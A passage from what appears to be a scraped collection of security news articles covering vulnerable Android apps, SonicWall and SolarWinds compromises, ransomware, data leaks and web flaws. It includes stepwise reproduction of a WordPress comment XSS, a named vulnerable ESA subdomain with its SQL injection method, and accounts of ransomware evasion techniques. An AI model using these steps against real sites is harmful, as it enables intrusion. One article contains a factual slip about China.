""We found 547 apps that used older versions of libupnp, 326 of which are available on the Google Play store,"" Trend Micro mobile analyst Veo Zhang wrote in a blog post published Thursday.
Vulnerable Apps Downloaded by Millions of People
The biggest app affected by the flaw is QQMusic, which is used by over 100 Million people in China alone and has been downloaded by millions of Android users from the Google Play store. However, the security issue has since been fixed by the developers.
The Netflix application, also downloaded by Millions of people, was also thought to be affected by the flaw though the researchers say:
""Upon further clarification with Netflix, we learned that Netflix uses their own fork of libupnp due to an API that is no longer a part of newer libupnp versions. However, their fork contains the fixes from newer versions of libupnp as well, so we believe they are not affected by potential remote code execution attacks targeting this vulnerability.""
Other popular applications using the outdated version of the library include nScreen Mirroring for Samsung, CameraAccess Plus and Smart TV Remote.
List of Vulnerable Apps
Here's the list of some apps, Trend Micro knows, are vulnerable and has actually tested:
Common Name
Package Name
CameraAccess plus
HexLink Remote (TV client)
HexLink-SmartTV remote control
Hisense Android TV Remote
nScreen Mirroring for Samsung
Ooredoo TV Oman
PictPrint – WiFi Print App –
Mozaic GO
Smart TV Remote
Wifi Entertainment
에브리온TV (무료 실시간 TV)
Though the makers of QQMusic and LinPhone have addressed the issue and released fixes for their apps, users are advised to check their devices for one of these apps and if discovered, simply removed it or check for an update.
The security researchers are continuing to find out more vulnerable app.
Hackers Exploiting Critical Zero-Day Bug in SonicWall SMA 100 Devices,https://thehackernews.com/2021/02/hackers-exploiting-critical-zero-day.html,"SonicWall on Monday warned of active exploitation attempts against a zero-day vulnerability in its Secure Mobile Access (SMA) 100 series devices.
The flaw, which affects both physical and virtual SMA 100 10.x devices (SMA 200, SMA 210, SMA 400, SMA 410, SMA 500v), came to light after the NCC Group on Sunday alerted it had detected ""indiscriminate use of an exploit in the wild.""
Details of the exploit have not been disclosed to prevent the zero-day from being misused further, but a patch is expected to be available by the end of day on February 2, 2021.
""A few thousand devices are impacted,"" SonicWall said in a statement, adding, ""SMA 100 firmware prior to 10.x is unaffected by this zero-day vulnerability.""
On January 22, The Hacker News exclusively revealed that SonicWall had been breached as a consequence of a coordinated attack on its internal systems by exploiting ""probable zero-day vulnerabilities"" in its SMA 100 series remote access devices.
Then last week, on January 29, the San Jose-based company issued an update stating it had so far only observed the use of previously stolen credentials to log into the SMA 100 series appliances.
While SonicWall has not shared many details about the intrusion citing an ongoing investigation, the latest development points to evidence that a critical zero-day in the SMA 100 series 10.x code may have been exploited to carry out the attack.
SonicWall is internally tracking the vulnerability as SNWLID-2021-0001.
The company said SonicWall firewalls and SMA 1000 series appliances, as well as all respective VPN clients, are unaffected and that they remain safe to use.
In the interim, the company recommends customers enable multi-factor authentication (MFA) and reset user passwords for accounts that utilize the SMA 100 series with 10.X firmware.
""If the SMA 100 series (10.x) is behind a firewall, block all access to the SMA 100 on the firewall,"" the company said. Users also have the option of shutting down the vulnerable SMA 100 series devices until a patch is available or load firmware version 9.x after a factory default settings reboot.
Update — Patches Released
SonicWall has formally released a patch to address a zero-day vulnerability in SMA 100 series 10.x code.
""All SonicWall customers with active SMA 100 series devices running 10.x code should immediately apply the patch on physical and virtual appliances,"" the company said in a statement. ""The patch also contains additional code to strengthen the device.""
While the company has not shared more details on the vulnerability, NCC Group's Rich Warren hinted that it might have something to do with an authentication bypass.
A Massive U.S. Property and Demographic Database Exposes 200 Million Records,https://thehackernews.com/2020/03/us-property-records-database.html,"More than 200 million records containing a wide range of property-related information on US residents were left exposed on a database that was accessible on the web without requiring any password or authentication.
The exposed data — a mix of personal and demographic details — included the name, address, email address, age, gender, ethnicity, employment, credit rating, investment preferences, income, net worth, and property information, such as:
Market value
Property type
Mortgage amount, rate, type, and lender
Refinance amount, rate, type, and lender
Previous owners
Year built
Number of beds and bathrooms
Tax assessment information
According to security firm Comparitech, the database, which was hosted on Google Cloud, is said to have been first indexed by search engine BinaryEdge on 26th January and discovered a day later by cybersecurity researcher Bob Diachenko.
But after failing to identify the database owner, the server was eventually taken offline more than a month later yesterday.
""We've been trying to contact Googles cloud security team (IP with database was hosted on their cloud) for them to take down the IP but never got a response,"" the research team told The Hacker News. ""No other ways to determine the owner were possible because no reverse DNS records were available due to the cloud-based nature of the IP.""
In all, the database comprised of 201,162,598 records, with each entry corresponding to a unique individual.
Comparitech noted that during the time it had access to the database, ""it was being updated with new data, suggesting that the information contained is fairly recent.""
Furthermore, the leak raises questions about the identity of the service that would need to store such detailed personally identifiable and demographic data of this kind.
Spear-phishing Warning
Given that the data was not adequately secured, it's not immediately clear if other unauthorized parties accessed this database and downloaded its content. The consequence of such exposure is the increased possibility of targeted spear-phishing attacks.
""The detailed personal, demographic, and property information contained in this data-set is a gold mine for spammers, scammers, and cybercriminals who run phishing campaigns,"" Comparitech said. ""The data allows criminals not only to target specific people but craft a more convincing message.""
Specifically, attackers could target individuals with phishing emails to deliver all kinds of malware that can download malicious programs and steal sensitive information.
It's therefore crucial that users turn on two-factor authentication to add a second layer of account protection.
The incident is not the only time instances of leaky servers have drawn headlines. In recent months, Ecuadorian and Russian citizens, and US government personnel have had their personal info left unprotected on Elasticsearch servers, underscoring that there's still a long way to go when it comes to cloud security.
Facebook Vulnerability Leaks Users' Private Photos,https://thehackernews.com/2015/03/facebook-photo-sync-hacking.html,"If you have enabled automatic Facebook Photo Sync feature on your iPhone, iPad or Android devices, then Beware! Hackers can steal your personal photographs without your knowledge.
In 2012, the social network giant introduced Facebook Photo Sync feature for iPhone, iPad and Android devices which, if opt-in, allows Facebook to automatically sync all your photos saved on your mobile device with your Facebook account.
The photos that you have synced from your phone are automatically uploaded in the background to a private Facebook album, which is not visible to any of your Facebook friends or other Facebook users. However, you may can choose then to share photos from the album on your Facebook timeline or send them as a message to a friend.
A bug bounty hunter, Laxman Muthiyah, discovered a critical flaw in the Facebook Photo Sync feature and Facebook API that could allow any third-party app to access your personal photos from the hidden Facebook Photo Sync album.
It's something that reminds me of ""The Fappenings"" and ""The Snappening"" -- in which nude and personal photographs of top celebrities were leaked due to a security flaw in Apple's iCloud file storage service and unofficial Snapchat messaging service app, respectively.
In a blog post published today, Laxman explained that the vulnerability resides in the privilege mechanism that which applications are allowed to access sync photos using vaultimages API.
""The vulnerable part is, it just checks the owner of the access token and not the application which is making the request. So it allows any application with user_photos permission to read your mobile photos,"" Laxman wrote in a blog post.
Technically, Synced private photo album should be accessible by only Facebook's official app, but the vulnerability allows any 3rd party apps to get permission to read your personal synced photos.
Laxman previously disclosed a vulnerability in Facebook Graph API mechanism that allowed him to delete any photo album on Facebook owned by any user, any page or any group.
Though, Facebook has patched the vulnerability reported by Laxman and rewarded him with $10,000 under it's bug bounty program, Facebook users are advised to turn off Facebook Photo Sync feature just to be on the safer side.
In order to do so, just go to Facebook mobile app menu, scroll down and select Account > App Settings > Sync Photos, then Choose 'Don't sync my photos.'
"""Cyber China"", from Operation Aurora to China Cyber Attacks Syndrome",https://thehackernews.com/2012/02/cyber-china-from-operation-aurora-to.html,"""Cyber China"", from Operation Aurora to China Cyber Attacks Syndrome
Security Expert, from Security Affairs - Pierluigi Paganini takes us on a visit to China via The Hacker News January Edition Magazine Article and makes us wonder just how influential China's hacking is on world internet security. Read and decide for yourself :
When we think of China in relation to cyber warfare, we imagine an army of hackers hired by the government in a computer room ready to successfully attack any potential target. China is perceived as a cyber power and ready to march against any insurmountable obstacle using any means. In this connection we read everything and its opposite, and we are ready to blame all sorts of cyber threat to the Country of the Rising Sun.
The truth, however, is quite different, at least in my opinion, and understands that the Chinese people before others have understood the importance of a strategic hegemony in cyber space. However, many doubts are beginning to gather on the real technological capabilities of China. It certainly has a high potential for cyber offensive but its quality is really arguable.
China has the most extensive cyber-warfare capabilities. It began to implement an Information Warfare strategy in 1995 conducting a huge quantity of exercises in which computer viruses have been used to interrupt military and private communications. In 2000, China established a strategic Information Warfare unit, Net Force, which is responsible for ""wage combat through computer networks to manipulate enemy information systems spanning spare parts deliveries to fire control and guidance systems."" Today The PLA GSD Third Department and Fourth Departments are considered to be the two largest players in China's burgeoning cyber-infrastructure.
In November 2011, Desmond Ball, a professor in the Strategic and Defense Studies Centre at Australia's National University argues that the Chinese offensive capabilities today are pretty limited and he has also declared that the internal security has a bunch of vulnerabilities.
Ball says that China's cyber-warfare capabilities are ""fairly rudimentary"", and is actually able to organize massive attacks (e.g. DDoS attacks) with little sophistication. The technology solutions behind the malware used are really poor and this makes them really simple to detect and remove before any damage has been done or data stolen. The capabilities shown cannot be sufficient to penetrate highly secure networks or covertly steal or falsify critical data.
Are we really sure that behind the attacks are China's hackers?
According cyber analysts, hackers in China and their attacks have different digital fingerprints, easily recognizable by analyzing the used computer code, and studying the command and control computers that they used to move their malicious software.
No doubt, analysts are convinced that attacks are coming from the Chinese government, because they have tracked enough intrusions to specific locations to be confident they are linked to Beijing cyber structures. Consider that the threat was persistent, spreading malware in target computer networks again and again over the course of several months or even years.
Which are the countries being targeted by China and which are the real target of this attacks?
Many cyber-intelligence operations have been conducted against numerous countries, including the United States, UK, Australia, New Zealand, Canada, Germany, France, the Netherlands, Portugal, Japan, South Korea, Taiwan, India, Pakistan, Iran, Thailand, the Philippines and Indonesia.
Consider that according to what has been published in the Office of the National Counterintelligence Executive report, prevalent usage of cyber operations is related to attempting to gain business and industrial secrets from companies, in this case from Americans.
Companies are frustrated that the government isn't doing enough to pressure China to stop the attacks which the Chinese government has officially been providing protection and anonymity to those groups of hackers.
In the last ten years the attacks have increased dramatically broadened to target defense companies, critical industries, major firms also including critical infrastructure.
China is considered one of the most dangerous players of cyber-espionage operations against world wide business. Forecast for the next years aren't encouraging because the government of China will maintain an aggressive approach and be capable of collecting sensitive economic, military and industrial information related foreign Nations.
To give you an idea of the huge quantity of attacks reported in 2011 for which China was directly or indirectly considered responsible I submit an interesting table prepared by the security expert Paolo Passeri. The list includes prominent victims such as RSA. Obviously we do not have total certainty on the array of attacks, but the evidence suggests that behind all of these operations there is a single performer, China.
Just last week Julian Assange has declared that Chinese intelligence penetrated into the intelligence system of the Indian government including the Indian equivalent of FBI, the Central Bureau of Investigation. This event brings to the fore the need for governments to have an appropriate cyber strategy so that National Security cannot be affected by such attacks. The economic development of a nation can no longer ignore these cyber attacks regardless of its awareness of the cyber threat.
Based on the above facts, I believe it is wrong to consider these attacks rudimentary as the effects demonstrate that they are really dangerous and efficient.
Another erroneous belief is that the Chinese government uses a large group of hackers to make the attack. According to a report supplied by the Associated Press the majority of the attacks emanating from China are conducted by a few as a dozen groups of hackers under the control and coordination of the Chinese government.
What is the economic impact of cyber attacks on the U.S.?
Considering a report recently released by the United States Office of the Counterintelligence Executive (ONCIX) several billions of dollars are lost in intellectual property and classified information disclosure every year due cyber espionage.
We are warned that the constant barrage of cyber attacks against economic and critical systems will require a unified effort by government and the private sector to improve security following a well defined cyber strategy addressed by the central Governments. Cyber warfare has just begun, stay sharp.
[Cross Post from Securityaffairs]
JavaScript hole in Facebook !,https://thehackernews.com/2011/03/javascript-hole-in-facebook.html,"Facebook made some important changes to the way in Facebook Pages, the fan pages set up by brands, bands and even cucumbers could be created.
In the past the tabs which could be added to these pages have been set up in two ways; the first used the Facebook FBML app. This allowed page tabs to be created using static Facebook Markup Language (FBML) or HTML, it wasn't particularly engaging but it was very simple to use. The second method for creating page tabs was by adding a custom Facebook app inside a standard FBML tab. This meant the custom app could request external data from a third party and display it inside the page tab. This content though was subject to many technical limitations, as it was all proxied through Facebook which broke many things including tracking pixels, JavaScript and Flash.
So what is the big change? Well Facebook now allow iframes to be included inside Facebook apps on page tabs, meaning that all that Facebook proxying can be avoided. While this is no doubt great news for legitimate developers it will undoubtedly make life for those with malicious intent much easier too.
It is now possible to set up a Facebook page, create a default landing tab (the one you first see when you visit the page) and include an app that contains an iframe. That iframe can for example contain JavaScript which immediately and without user interaction redirects you to any site it chooses. Say for example a page containing Fake AV or a page where an exploit kit is waiting to silently infect you with malware.
No more likejacking required, no more having to persuade users to install your app, if a criminal can make the bait sweet enough just to get you to visit the page, that is all they will require to start the chain that leads to your computer being compromised and used for criminal purposes.
Of course Facebook ask their developers to agree to a code of conduct that prohibits such activities, but when it comes to criminals, that's a bit like taking a driving license away from a joyrider.
I have informed Facebook of this oversight in their new functionality and will update this blog posting if I hear back from them.
Thanks to Stig Edvartsen for his eagle-eyes and Heidi Obschil-Müller for the iframe
News Source : https://mcaf.ee/b81e2
European Space Agency SQL vulnerability exploited,https://thehackernews.com/2012/12/european-space-agency-sql-vulnerability.html,"The European Space Agency (ESA) is an intergovernmental organisation dedicated to the exploration of space. Hacker going by name ""SlixMe"" find and exploit SQL Injection vulnerability on a sub domain of website.
Hacker upload dump on his website, where he disclose the SQLi vulnerable link and Database tables also. Hacker also mention that other 5 domains are also hosted on same server, that can be exploited if he will be successful to exploit one site completely.
Exploited Domain : https://television.esa.int/
Method mentioned as ""PostgreSQL AND error-based - WHERE or HAVING clause"". In further discluse the PayLoad of injection also published.
Site is vulnerable at time of publishing this article.
Google Warning about New State Sponsored Attacks,https://thehackernews.com/2012/10/google-warning-about-new-state.html,"""Warning: We believe state-sponsored attackers may be attempting to compromise your account or computer."" From last 3 months Google users were surprised to see this unusual notification at the top of their Gmail inbox, Google home page or Chrome browser. These warnings are not being shown because Google's internal systems have been compromised or because of a particular attack.
""The company said that since it started alerting users to malicious probably state-sponsored activity on their computers in June, it has picked up thousands more instances of cyberattacks than it anticipated."" NYtimes said. Google will now start sending out these messages to tens of thousands more people, as its methods for detecting suspicious activity have improved.
Mike Wiacek, a manager on Google's information security team, said that since then, Google has improved its knowledge on attack methods and the groups behind them, and has started pushing out new alerts on Tuesday - as evidenced by a slew of U.S. journalists, researchers and foreign policy experts who said they already received the warning.
Noah Schactman, the editor of Wired's national security blog ""Danger Room,"" tweeted: ""Aaaaand I just got Google's 'you may be a victim of a state-sponsored attack' notice. #WhatTookYouSoLong?""
Mr. Wiacek noted that Google had seen an increase in state-sponsored activity coming from the Middle East. He declined to call out particular countries, but he said the activity was coming from ""a slew of different countries"" in the region.
Here's How Hackers Could Have Spied On Your DJI Drone Account,https://thehackernews.com/2018/11/dji-drone-hack_8.html,"Cybersecurity researchers at Check Point today revealed details of a potential dangerous vulnerability in DJI Drone web app that could have allowed attackers access user accounts and synced sensitive information within it, including flight records, location, live video camera feed, and photos taken during a flight.
Thought the vulnerability was discovered and responsibly reported by the security firm Check Point to the DJI security team in March this year, the popular China-based drone manufacturing company fixed the issue after almost six months in September.
The account takeover attack takes advantage of a total of three vulnerabilities in the DJI infrastructure, including a Secure Cookie bug in the DJI identification process, a cross-site scripting (XSS) flaw in its Forum and a SSL Pinning issue in its mobile app.
The first vulnerability, i.e. not having the ""secure"" and ""httponly"" cookie flag enabled, allowed attackers to steal login cookies of a user by injecting a malicious JavaScript into the DJI Forum website using the XSS vulnerability.
""To trigger this XSS attack all the attacker need do is to write a simple post in the DJI forum which would contain the link to the payload,"" the researchers explained in a report published today.
""A user who logged into DJI Forum, then clicked a specially-planted malicious link, could have had his or her login credentials stolen to allow access to other DJI online assets,""
Once captured, the login cookies, which include authentication tokens, can then be re-used to take complete control over the user's DJI Web Account, the DJI GO/4/pilot Mobile Applications and account on its centralized drone operations management platform called DJI Flighthub.
However, to access the compromised account on the DJI mobile apps, attackers have to first intercept the Mobile application traffic after bypassing its implementation of SSL pinning by performing man-in-the-middle (MitM) attack to the DJI server using Burp Suite.
""We also carried out further research and found that by parsing flight logs files we can get much more information such as location and angle of every picture taken during the drone's flight, the drone's home location, last known location and more,"" researchers said.
DJI classified the vulnerability as ""high risk—low probability,"" because successful exploitation of the flaw required a user ""to be logged into their DJI account while clicking on a specially-planted malicious link in the DJI Forum.""
DJI also said the company did not find any evidence of the flaw being exploited in the wild.
Check Point researchers reported the vulnerability to the DJI through its bug bounty program, but declined to reveal the financial reward offered to them. The DJI bug bounty program offers up to $30,000 in rewards for single vulnerabilities.
DJI has been facing scrutiny in the United States after the Department of Homeland Security (DHS) released a memo late last year accusing the company of sending sensitive information about the U.S. infrastructure to China through its commercial drones and software.
However, the drone maker denied the allegations, saying that the memo from the US government office was based on ""clearly false and misleading claims.""
Snatch Ransomware Reboots Windows in Safe Mode to Bypass Antivirus,https://thehackernews.com/2019/12/snatch-ransomware-safe-mode.html,"Cybersecurity researchers have spotted a new variant of the Snatch ransomware that first reboots infected Windows computers into Safe Mode and only then encrypts victims' files to avoid antivirus detection.
Unlike traditional malware, the new Snatch ransomware chooses to run in Safe Mode because in the diagnostic mode Windows operating system starts with a minimal set of drivers and services without loading most of the third-party startup programs, including antivirus software.
Snatch has been active since at least the summer of 2018, but SophosLabs researchers spotted the Safe Mode enhancement to this ransomware strain only in recent cyber attacks against various entities they investigated.
""SophosLabs researchers have been investigating an ongoing series of ransomware attacks in which the ransomware executable forces the Windows machine to reboot into Safe Mode before beginning the encryption process,"" the researchers say.
""The ransomware, which calls itself Snatch, sets itself up as a service [called SuperBackupMan with the help of Windows registry] that will run during a Safe Mode boot.""
""When the computer comes back up after the reboot, this time in Safe Mode, the malware uses the Windows component net.exe to halt the SuperBackupMan service, and then uses the Windows component vssadmin.exe to delete all the Volume Shadow Copies on the system, which prevents forensic recovery of the files encrypted by the ransomware.""
What makes Snatch different and dangerous from others is that in addition to ransomware, it's also a data stealer. Snatch includes a sophisticated data-stealing module, allowing attackers to steal vast amounts of information from the target organizations.
Though Snatch is written in Go, a programming language known for cross-platform app development, the authors have designed this ransomware to run only on the Windows platform.
""Snatch can run on most common versions of Windows, from 7 through 10, in 32- and 64-bit versions. The samples we've seen are also packed with the open source packer UPX to obfuscate their contents,"" the researchers say.
Besides this, the attackers behind Snatch ransomware also offer partnership opportunities to other cybercriminals and rogue employees who possess credentials and backdoors into large organizations and can exploit it to deploy the ransomware.
As shown in the screenshot taken from an underground forum, one of the group members posted an offer ""looking for affiliate partners with access to RDP \ VNC \ TeamViewer \ WebShell \ SQL injection in corporate networks, stores, and other companies.""
Using brute-forced or stolen credentials, attackers first gain access to the company's internal network and then run several legitimate system administrators and penetration testing tools to compromise devices within the same network without raising any red flag.
""We also found a range of otherwise legitimate tools that have been adopted by criminals installed on machines within the target's network, including Process Hacker, IObit Uninstaller, PowerTool, and PsExec. The attackers typically use them to try to disable AV products,"" the researchers say.
Coveware, a company that specializes in extortion negotiations between attackers and ransomware victims, told Sophos that they negotiated with the Snatch criminals ""on 12 occasions between July and October 2019 on behalf of their clients"" with the ransom payments ranging between $2,000 to $35,000 in bitcoins.
To prevent ransomware attacks, organizations are recommended not to expose their critical services and secure ports to the public Internet, and if required, secure them using a strong password with multi-factor authentication.
Zero Day Reflected Cross Site Scripting vulnerability in wordpress 3.3,https://thehackernews.com/2012/01/zero-day-reflected-cross-site-scripting.html,"Zero Day Reflected Cross Site Scripting vulnerability in wordpress 3.3
Two Indian Security Experts : Aditya Modha & Samir Shah from from Net-Square Solutions reveals Zero Day Reflected Cross Site Scripting vulnerability in latest version of wordpress 3.3 !
Vulnerability exploit the comment feature of Wordpress Blog. Following two Steps mentioned in Exploit.
Step 1: Post a comment to the target website.
Step 2: Replace the value of author tag, email tag, comment tag with the exact value of what has been post in the last comment. Change the value of comment_post_ID to the value of post (which can be known by opening that post and checking the value of p parameter in the url). For example the if the url is then the value of comment_post_ID is 6.
Get Complete Exploit Here
Security Firm Reveals Flaw in Dirt Jumper Bot,https://thehackernews.com/2012/08/security-firm-reveals-flaw-in-dirt.html,"A team of researchers has discovered a weakness in the command-and-control infrastructure of one of the major DDoS toolkits, Dirt Jumper, that enables them to stop attacks that are in progress.
The command and control (C&C) servers of the Dirt Jumper DDoS toolkit can be compromised and, in principle, completely taken over via SQL injection holes.
SQL injection involves inserting database instructions in unexpected and unprotected places, effectively taking charge of a web application's database from the outside. According to the Prolexic report, the open source penetration testing tool sqlmap can be used to dump the contents of Dirt Jumper's database configuration file in a matter of seconds, revealing administrative usernames and passwords.
The company's research includes Dirt Jumper v.3, Pandora and Di BoT. According to Prolexic, the Dirt Jumper family of DDoS botnet kits was originally authored by an individual who uses the handle 'sokol.' Various versions of Dirt Jumper were sold privately and leaked to the public.
""DDoS attackers take pride in finding and exploiting weaknesses in the architecture and code of their targets. With this vulnerability report, we've turned the tables and exposed crucial weaknesses in their own tools,"" said Prolexic's CEO, Scott Hammack.
Pandora can be used to launch five different attack types, including a combination of techniques against the web application and infrastructure layers of targeted websites. Dirt Jumper seems to have overtaken rivals to become one of the most successful DDoS toolkits available on the Russian underground.
""Construction of a new variant of Dirt Jumper is relatively easy, only requiring basic knowledge of Delphi, a basic understanding of PHP and MySQL, and U.S. $5,000 to purchase the Dirt Jumper builder source code"".
This Ransomware Malware Could Poison Your Water Supply If Not Paid,https://thehackernews.com/2017/02/scary-scada-ransomware.html,"Ransomware has been around for a few years, but in last two years, it has become an albatross around everyone's neck, targeting businesses, hospitals, financial institutions and personal computers worldwide and extorting millions of dollars.
Ransomware is a type of malware that infects computers and encrypts their content with strong encryption algorithms, and then demands a ransom to decrypt that data.
It turned out to be a noxious game of Hackers to get paid effortlessly.
Initially, ransomware used to target regular internet users, but in past few months, we have already seen the threat targeting enterprises, educational facilities, and hospitals, hotels, and other businesses.
And now, the threat has gone Worse!
This PoC Ransomware Could Poison Water Supply!
Researchers at the Georgia Institute of Technology (GIT) have demonstrated the capability of ransomware to take down the critical infrastructure our cities need to operate, causing havoc among people.
GIT researchers created a proof-of-concept ransomware that, in a simulated environment, was able to gain control of a water treatment plant and threaten to shut off the entire water supply or poison the city's water by increasing the amount of chlorine in it.
Dubbed LogicLocker, the ransomware, presented at the 2017 RSA Conference in San Francisco, allowed researchers to alter Programmable Logic Controllers (PLCs) — the tiny computers that control critical Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA) infrastructure, like power plants or water treatment facilities.
This, in turn, gave them the ability to shut valves, control the amount of chlorine in the water, and display false readouts.
Sounds scary, Right?
Fortunately, this has not happened yet, but researchers say this is only a matter of time.
The simulated attack by researchers was created to highlight how attackers could disrupt vital services which cater to our critical needs, like water management utilities, energy providers, escalator controllers, HVAC (heating, ventilation and air conditioning) systems, and other mechanical systems.
Over 1500 PLC Systems Open To Ransomware Attack
LogicLocker targets three types of PLCs that are exposed online and infects them to reprogram the tiny computer with a new password, locking the legitimate owners out and demanding ransom while holding the utility hostage.
If the owners pay, they get their control over the PLC back. But if not, the hackers could malfunction water plant, or worse, dump life-threatening amounts of chlorine in water supplies that could potentially poison entire cities.
GIT researchers searched the internet for the two models of PLCs that they targeted during their experiment and found more than 1,500 PLCs that were exposed online.
""There are common misconceptions about what is connected to the internet,"" says researcher David Formby. ""Operators may believe their systems are air-gapped and that there's no way to access the controllers, but these systems are often connected in some way.""
Targeting industrial control and SCADA systems is not new, cybercriminals and nation-state actors are doing this for years, with programs like Stuxnet, Flame, and Duqu, but ransomware will soon add a financial element to these type of cyber attacks.
Therefore, it is inevitable that money-motivated criminals will soon target critical infrastructure directly. Additionally, the nation-state actors could also hide their intentions under ransomware operators.
So, it is high time for industrial control systems and SCADA operators to start adopting standard security practices like changing the PLCs default passwords, limiting their connections by placing them behind a firewall, scanning their networks for potential threats, and install intrusion monitoring systems.
"France Telecom Orange Hacked Again, Personal Details of 1.3 Million Customers Stolen",https://thehackernews.com/2014/05/france-telecom-orange-hacked-again.html,"French leading telecommunications company 'Orange' hit by second major data breach of its kind in a matter of months. Company announced that hackers have stolen personal data of 1.3 million customers of its online portal.
Hackers have stolen a ""limited amount of personal information concerning clients and future customers"", including their first names, Surnames email addresses, phone numbers for both mobiles and fixed lines, dates of birth as well as the names of clients' mobile and Internet operators.
""The data recovered could be used to contact those concerned by email, SMS or by phone, particularly for phishing purposes,"" company said in an statement.
The Incident was detected by the company on April 18, but the company has waited until now to inform customers to determine its full extent and to ensure that the security holes leveraged by the hackers have been patched.
We don't know what the motivations of the Cyber criminals are, it is not known what will actually happen to the Stolen Database. The attackers know the recipients name, so this could potentially lead to e-mail spam and phishing attacks.
Such attacks are frequently disguised as an email from a company asking the customer to provide sensitive information such as passwords, user names or credit card details.
""The data collected could be used to contact people involved in e-mail, SMS or telephone, including for phishing"" warns Orange.
In February, Orange revealed a separate security breach, in which more than 800,000 users' emails, passwords, addresses and phone numbers had been stolen from its customer website.
Orange also reported that it had found the source of the attack and has filed an official police complaint about the data breach.
US Agencies and FireEye Were Hacked Using SolarWinds Software Backdoor,https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html,"State-sponsored actors allegedly working for Russia have targeted the US Treasury, the Commerce Department's National Telecommunications and Information Administration (NTIA), and other government agencies to monitor internal email traffic as part of a widespread cyberespionage campaign.
The Washington Post, citing unnamed sources, said the latest attacks were the work of APT29 or Cozy Bear, the same hacking group that's believed to have orchestrated a breach of US-based cybersecurity firm FireEye a few days ago leading to the theft of its Red Team penetration testing tools.
The motive and the full scope of what intelligence was compromised remains unclear, but signs are that adversaries tampered with a software update released by Texas-based IT infrastructure provider SolarWinds earlier this year to infiltrate the systems of government agencies as well as FireEye and mount a highly-sophisticated supply chain attack.
""The compromise of SolarWinds' Orion Network Management Products poses unacceptable risks to the security of federal networks,"" said Brandon Wales, acting director of the US Cybersecurity and Infrastructure Security Agency (CISA), which has released an emergency directive, urging federal civilian agencies to review their networks for suspicious activity and disconnect or power down SolarWinds Orion products immediately.
SolarWinds' networking and security products are used by more than 300,000 customers worldwide, including Fortune 500 companies, government agencies, and education institutions.
It also serves several major US telecommunications companies, all five branches of the US Military, and other prominent government organizations such as the Pentagon, State Department, NASA, National Security Agency (NSA), Postal Service, NOAA, Department of Justice, and the Office of the President of the United States.
An Evasive Campaign to Distribute SUNBURST Backdoor
FireEye, which is tracking the ongoing intrusion campaign under the moniker ""UNC2452,"" said the supply chain attack takes advantage of trojanized SolarWinds Orion business software updates in order to distribute a backdoor called SUNBURST.
""This campaign may have begun as early as Spring 2020 and is currently ongoing,"" FireEye said in a Sunday analysis. ""Post compromise activity following this supply chain compromise has included lateral movement and data theft. The campaign is the work of a highly skilled actor and the operation was conducted with significant operational security.""
This rogue version of SolarWinds Orion plug-in, besides masquerading its network traffic as the Orion Improvement Program (OIP) protocol, is said to communicate via HTTP to remote servers so as to retrieve and execute malicious commands (""Jobs"") that cover the spyware gamut, including those for transferring files, executing files, profiling and rebooting the target system, and disabling system services.
Orion Improvement Program or OIP is chiefly used to collect performance and usage statistics data from SolarWinds users for product improvement purposes.
What's more, the IP addresses used for the campaign were obfuscated by VPN servers located in the same country as the victim to evade detection.
Microsoft also corroborated the findings in a separate analysis, stating the attack (which it calls ""Solorigate"") leveraged the trust associated with SolarWinds software to insert malicious code as part of a larger campaign.
""A malicious software class was included among many other legitimate classes and then signed with a legitimate certificate,"" the Windows maker said. The resulting binary included a backdoor and was then discreetly distributed into targeted organizations.""
SolarWinds Releases Security Advisory
In a security advisory published by SolarWinds, the company said the attack targets versions 2019.4 through 2020.2.1 of the SolarWinds Orion Platform software that was released between March and June 2020, while recommending users to upgrade to Orion Platform release 2020.2.1 HF 1 immediately.
The firm, which is currently investigating the attack in coordination with FireEye and the US Federal Bureau of Investigation, is also expected to release an additional hotfix, 2020.2.1 HF 2, on December 15, which replaces the compromised component and provides several extra security enhancements.
FireEye last week disclosed that it fell victim to a highly sophisticated foreign-government attack that compromised its software tools used to test the defenses of its customers.
Totaling as many as 60 in number, the stolen Red Team tools are a mix of publicly available tools (43%), modified versions of publicly available tools (17%), and those that were developed in-house (40%).
Furthermore, the theft also includes exploit payloads that leverage critical vulnerabilities in Pulse Secure SSL VPN (CVE-2019-11510), Microsoft Active Directory (CVE-2020-1472), Zoho ManageEngine Desktop Central (CVE-2020-10189), and Windows Remote Desktop Services (CVE-2019-0708).
The campaign, ultimately, appears to be a supply chain attack on a global scale, for FireEye said it detected this activity across several entities worldwide, spanning government, consulting, technology, telecom, and extractive firms in North America, Europe, Asia, and the Middle East.
The indicators of compromise (IoCs) and other relevant attack signatures designed to counter SUNBURST can be accessed here.
13-year-old SSL/TLS Weakness Exposing Sensitive Data in Plain Text,https://thehackernews.com/2015/03/rc4-ssl-tls-security.html,"The most popular and widely used encryption scheme has been found to be weaker with the disclosure of a new attack that could allow attackers to steal credit card numbers, passwords and other sensitive data from transmissions protected by SSL (secure sockets layer) and TLS (transport layer security) protocols.
The attack leverages a 13-year-old weakness in the less secure Rivest Cipher 4 (RC4) encryption algorithm, which is the most commonly used stream cipher for protecting 30 percent of TLS traffic on the Internet today.
The attack, dubbed ""Bar-Mitzvah"", can be carried out even without conducting man-in-the-middle attack (MITM) between the client and the server, as in the case of most of the previous SSL hacks.
Itsik Mantin, a researcher from security firm Imperva, presented his findings in a research titled, ""Attacking SSL when using RC4"" at the Black Hat Asia security conference Thursday in Singapore.
Bar Mitzvah attack actually exploits the ""Invariance Weakness,"" the weak key pattern used in RC4 keys that can leak plain text data from the encrypted SSL/TLS traffic into the cipher text under certain conditions, potentially exposing account credentials, credit card data, or other sensitive information to hackers.
The Invariance Weakness of RC4 pseudo-random stream allows an attacker to distinguish RC4 streams from randomness and increase the probability to leak sensitive data in plain text.
""The security of RC4 [algorithm] has been questionable for many years, in particular its initialization mechanisms,"" researchers wrote in a research paper (pdf).
""However, only in recent years has this understanding begun translating into a call to retire RC4. In this research, we follow [researches on 2013 RC4] and show that the impact of the many known vulnerabilities on systems using RC4 is clearly underestimated.""
Bar Mitzvah is the first 'practical' attack on SSL that only requires passive sniffing or eavesdropping on SSL/TLS-encrypted connections, rather a man-in-the-middle attack, Mantin says. Though, researcher says MITM attack could be used as well for hijacking a session.
While waiting for a ""broad-brush retirement of RC4,"" administrators should consider the following steps to protect themselves from RC4 weaknesses:
Web application admins should disable RC4 in their applications' TLS configurations.
Web users (particularly power users) should disable RC4 in their browser's TLS configuration.
Browser providers should consider removing RC4 from their TLS cipher lists.
